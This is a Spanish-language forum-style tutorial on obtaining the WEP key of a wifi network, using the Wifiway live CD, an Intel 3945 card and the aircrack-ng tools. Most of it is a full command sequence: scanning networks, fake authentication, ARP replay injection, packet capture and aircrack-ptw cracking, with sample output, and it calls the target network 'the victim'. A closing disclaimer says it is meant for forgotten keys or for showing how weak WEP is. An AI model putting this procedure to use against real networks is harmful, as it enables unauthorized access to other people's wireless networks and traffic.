ACTUALIZACIÓN AQUÍ
Como muchos me preguntais sobre como obtener una clave wep, os lo dejor por aquí para que tengais toda la info a mano.
Lo que necesitais:
Este minituto está pensado para un ordenador portátil con tarjeta de red intel 3945 (ya que muchosportatiles están saliendo con ella) aunque no descarto que no funcione con otros dispositivos.
Tambien necesitaremos una distribucion de Linux, en live CD, yo usé Wifiway, se descarga aquí:
WifiwayYa está, no necesitamos nada más, ni instalar nada ni descargar nada más.
Arrancamos la live y después de configurar el idioma, una vez todo cargado, arrancamos las X, escribiendo "startx" (sin comillas)
Una vez en el entorno gráfico abrimos una consola.
Y escribimos:
wifiway:/# ipw3945_es.sh
nos pedirá que introduzcamos el canal, el rate y la dirección mac
Para el canal, se refiere al canal de la conexion que intentamos averiguar, si no lo sabemos podemos ir probando (con valores del 1 al 12) para el rate, siempre 2 y la mac, empezaremos poniendo 00:11:22:33:44:55
Ahora escribiremos:
wifiway:/# airodump-ng rtap0
Nos saldrá algo así:
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:09:5B:1C:AA:1D 11 16 10 0 0 11 54. OPN NETGEAR
00:14:6C:7A:41:81 34 100 57 14 1 9 11 WEP WEP bigbear
BSSID STATION PWR Lost Packets Probes
00:14:6C:7A:41:81 00:0F:B5:32:31:31 51 2 14
(not associated) 00:14:A4:3F:8D:13 19 0 4 mossy
00:14:6C:7A:41:81 00:0C:41:52:D1:D1 -1 0 5
Donde CH es el canal, BSSID la dirección MAC de la víctima y ESSID el nombre de la red.
Volvemos a escribir:
wifiway:/# ipw3945_es.sh
Pero ahora introducimos los datos del canal y la dirección MAC
Seguimos escribiendo:
wifiway:/# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h NUESTRA_MAC wifi0
Nos saldrá esto:
20:18:20 Sending Authentication Request
20:18:20 Authentication successful
20:18:20 Sending Association Request
20:18:20 Association successful :-)
Escribimos:
wifiway:/# aireplay-ng -3 -b MAC_AP -h NUESTRA_MAC wifi0
Abrimos otra consola y escribimos:
wifiway:/# airodump-ng -w /tmp/dump rtap0
Ahora a esperar a que suban los data.
En otra consola tecleamos:
wifiway:/# aircrack-ptw /tmp/dump-01.cap
Y ya está, vamos probando (volviendo a escribir en la tercera consola lo anterior) hasta que nos de la contraseña.
El tiempo necesarios es proporcional a la distacia.
Preguntas que os puedes salir:
¿como sé si mi targeta es una intel 3945?¿Y mi dirección mac?
Muy fácil, (desde Windows) en propiedades de mi PC\Hardware\Administrador de dispositivos\adaptador de red.
Además, tambien allí, en propiedades de la misma tarjeta y en la pestaña, avanzadas, podemos ver nuestra dirección MAC
Debo escribir en la consola pero no puedo.
Presiona CONTROL+C para que la consola deje de trabajar y acepte una nueva orden.
Recordad que os dejo esto, sólo por si habeis olvidado vuestra contraseña wep, o para que comprobeis lo fácil que es obtenerla y os planteeis otra forma de seguridad.